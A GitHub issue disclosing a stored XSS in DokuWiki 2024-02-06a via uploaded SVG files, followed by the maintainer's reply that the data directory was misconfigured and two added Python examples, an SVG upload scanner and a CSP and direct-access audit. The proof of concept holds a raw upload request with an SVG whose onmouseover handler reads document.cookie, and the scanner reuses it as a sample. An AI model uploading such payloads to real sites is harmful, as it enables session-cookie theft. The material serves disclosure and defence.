
DokuWiki 2024-02-06a has a stored XSS vulnerability #4267

Closed
Hebing123 opened this issue Apr 16, 2024 · 1 comment

Comments

@Hebing123

Hebing123 commented Apr 16, 2024

Summary

DokuWiki 2024-02-06a has a stored XSS vulnerability: an attacker can upload a malicious SVG file to obtain other users' cookies.

Details

We found that in the Media Manager, SVG is allowed in the file extension list. SVG files can execute HTML code.

We uploaded an SVG file that contains malicious code, and then clicked to view it: http://192.168.160.154:1042/lib/exe/fetch.php?media=alert.svg

It doesn't seem to trigger the popup code. But when we access the URL http://192.168.160.154:1042/data/media/alert.svg, we found that it successfully executed the code. We should not put the save location of the SVG file in a place where the user can access it. The fetch.php file used for HTML code filtering here looks funny.

Of course, it is important to note that not every SVG file can be successfully uploaded, because I have noticed that when an SVG file is uploaded, the server detects malicious code and reports that the upload operation is blocked because of possible malicious content.

Proof of Concept (POC)

POST /lib/exe/ajax.php?tab_files=files&tab_details=view&do=media&ns=&sectok=&mediaid=&call=mediaupload&qqfile=alert.svg&ow=false HTTP/1.1
Host: your-ip
Content-Length: 195
X-Requested-With: XMLHttpRequest
X-File-Name: alert.svg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Content-Type: application/octet-stream
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <circle r="50" cx="50" cy="50" fill="red" 
            onmouseover="alert(document.cookie);" />
</svg>

Then visiting http://your-ip/data/media/alert.svg triggers it.

Version of DokuWiki

DokuWiki 2024-02-06a "Kaos"

PHP Version

8.2

@Hebing123 Hebing123 added the Bug label Apr 16, 2024
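The report mentions that the upload handler already rejects some SVG files as "possible malicious content". The following is an added example of what such an upload-time inspection looks like; it is not DokuWiki's own check and does not claim to match it. It parses the SVG as XML and reports the constructs that make an SVG execute script when a browser renders it as a top-level document (rather than via an img element): script elements, on* event-handler attributes, javascript: URLs in href/xlink:href, and foreignObject. The sample documents are constructed for the example; the first one is the payload from this issue. A check like this is a second line of defence only; serving media through fetch.php with a CSP, as the maintainer describes below, is what actually prevents execution.

```python
"""Upload-time inspection of SVG files for active content.

Added example for this issue; not DokuWiki's own upload check. It walks
the XML tree and reports the constructs that make an SVG execute script
when a browser renders it as a document rather than as an <img>:
<script> elements, on* event-handler attributes, javascript: URLs in
href/xlink:href, and <foreignObject> (which can embed arbitrary HTML).
The sample documents at the bottom are constructed for this example;
the first one reproduces the issue's proof of concept.
"""
import xml.etree.ElementTree as ET


def _local_name(qualified: str) -> str:
    """Strip the {namespace} prefix that ElementTree puts on tags and attributes."""
    return qualified.rsplit("}", 1)[-1]


def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings: list[str] = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # A file that is not well-formed XML is rejected outright rather than
        # guessed at; a browser and this parser might otherwise disagree.
        return [f"not well-formed XML: {exc}"]

    for elem in root.iter():
        tag = _local_name(elem.tag).lower()
        if tag == "script":
            findings.append("<script> element")
        elif tag == "foreignobject":
            findings.append("<foreignObject> element")
        for attr, value in elem.attrib.items():
            name = _local_name(attr).lower()
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
    return findings


def upload_allowed(svg_bytes: bytes) -> bool:
    """Policy hook an upload handler would call: reject on any finding."""
    return not find_active_content(svg_bytes)


# Constructed samples. POC_SVG is the payload from the issue report.
POC_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <circle r="50" cx="50" cy="50" fill="red"
            onmouseover="alert(document.cookie);" />
</svg>"""

LINK_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
</svg>"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
    <circle r="50" cx="50" cy="50" fill="red"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("poc", POC_SVG), ("link", LINK_SVG), ("clean", CLEAN_SVG)):
        verdict = "allowed" if upload_allowed(doc) else "blocked"
        print(label, verdict, find_active_content(doc))
```

The check is deliberately a blocklist over parsed structure rather than a regex over the raw bytes, so encoded or oddly-cased markup that the XML parser normalises is still seen; it does not cover every way an SVG can load external resources (for example data: URLs in image or use elements), which is why the rendering-side controls matter more.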
@splitbrain
Collaborator

Your data directory should never be directly accessible. This is a misconfiguration of your webserver and the admin interface should warn you about it. All access to media files has to go through the fetch.php dispatcher which will add a CSP header to prevent attacks like these (and will also check ACLs).
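An added example, not DokuWiki's own code, of how an administrator can verify the two conditions stated in this reply on their own installation: that data/ is not reachable directly, and that media fetched through lib/exe/fetch.php carries a Content-Security-Policy under which inline handlers such as the onmouseover in the proof of concept cannot run. The header-judgement logic is kept in pure functions and exercised on constructed responses, so it runs offline; audit() does the real HTTP calls with urllib. BASE_URL and MEDIA_ID are placeholders, and the exact CSP DokuWiki emits is not assumed; the check only asks whether the effective script source list excludes 'unsafe-inline' and is otherwise 'none'.

```python
"""Audit of the two conditions in the maintainer's reply: the data/
directory must not be reachable directly, and media served through
lib/exe/fetch.php must carry a Content-Security-Policy that forbids
script execution. Added example, not DokuWiki code. The decision
functions are pure and are exercised on constructed responses below;
audit() performs the HTTP requests with urllib when run against a wiki.
BASE_URL and MEDIA_ID are placeholders for the example.
"""
import urllib.error
import urllib.request
from urllib.parse import quote

BASE_URL = "http://wiki.example.test"   # placeholder, replace with your wiki
MEDIA_ID = "alert.svg"                  # media id used in the report


def parse_csp(header_value: str) -> dict[str, list[str]]:
    """Split 'a b; c d' into {'a': ['b'], 'c': ['d']} with lowercased tokens."""
    directives: dict[str, list[str]] = {}
    for part in header_value.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def script_policy_issues(headers: dict[str, str]) -> list[str]:
    """Problems with the headers on a fetch.php response for an SVG.

    Inline handlers such as onmouseover run unless the effective script
    source list (script-src, falling back to default-src) excludes them.
    """
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy")
    if csp is None:
        return ["no Content-Security-Policy header"]
    directives = parse_csp(csp)
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return ["CSP has neither script-src nor default-src"]
    if "'unsafe-inline'" in sources:
        return ["CSP allows inline script handlers ('unsafe-inline')"]
    if sources != ["'none'"]:
        return ["CSP blocks inline handlers but permits script from: " + " ".join(sources)]
    return []


def direct_access_exposed(status: int) -> bool:
    """A 200 on data/media/<file> means the data directory is web-accessible."""
    return status == 200


def _get(url: str) -> tuple[int, dict[str, str]]:
    """GET a URL and return (status, headers); HTTP errors are results, not failures."""
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, dict(resp.headers.items())
    except urllib.error.HTTPError as err:
        return err.code, dict(err.headers.items())


def audit(base_url: str = BASE_URL, media_id: str = MEDIA_ID) -> dict[str, list[str]]:
    """Run both checks against a live wiki and return the findings per check."""
    report: dict[str, list[str]] = {}
    status, _ = _get(f"{base_url}/data/media/{quote(media_id)}")
    report["direct access"] = (
        ["data/ directory is served directly by the webserver"]
        if direct_access_exposed(status) else []
    )
    status, headers = _get(f"{base_url}/lib/exe/fetch.php?media={quote(media_id)}")
    report["fetch.php headers"] = (
        script_policy_issues(headers) if status == 200 else [f"fetch.php returned {status}"]
    )
    return report


# Constructed responses for offline use: a hardened dispatcher response,
# a file served straight from disk with no policy, and a permissive CSP.
HARDENED = {"Content-Type": "image/svg+xml",
            "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'"}
EXPOSED = {"Content-Type": "image/svg+xml"}
WEAK = {"Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline'"}

if __name__ == "__main__":
    for name, hdrs in (("hardened", HARDENED), ("exposed", EXPOSED), ("weak", WEAK)):
        print(name, script_policy_issues(hdrs) or "ok")
    # Uncomment to audit a real installation:
    # print(audit())
```

The direct-access probe is the decisive one for this report: if data/media/alert.svg answers 200, the webserver is serving the data directory and no header on fetch.php helps, because the attacker's link simply bypasses the dispatcher.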
